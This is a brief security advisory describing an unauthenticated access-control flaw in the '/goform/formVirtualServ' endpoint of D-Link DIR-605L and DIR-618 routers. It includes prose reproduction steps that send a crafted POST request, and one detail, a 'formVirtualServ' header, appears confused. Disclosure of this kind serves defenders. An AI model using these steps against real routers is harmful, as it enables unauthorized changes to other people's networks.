D-Link DIR-605L and DIR-618 Improper Access Control Vulnerability

A vulnerability allowing improper access control has been identified in the D-Link DIR-605L and DIR-618 routers, specifically in versions 2.02 and 3.02. This issue arises in the web management interface, where the file '/goform/formVirtualServ' is processed. The vulnerability allows unauthorized users to manipulate virtual service settings by sending specially crafted HTTP POST requests. Exploitation of this vulnerability requires no authentication and can be performed from within the local network.

Impact

Exploitation of this vulnerability allows unauthorized users to change the virtual service settings on the affected router, potentially leading to misconfigurations or unauthorized access to network services.

Reproduction

To reproduce this vulnerability, send an unauthenticated HTTP POST request to the '/goform/formVirtualServ' endpoint. Include the 'formVirtualServ' header to specify the virtual service settings to be modified. This can be done using tools like curl or Postman, or through a custom script that automates the process.

Remediation

It is recommended to use a firewall to block unauthorized access to the router's management interface.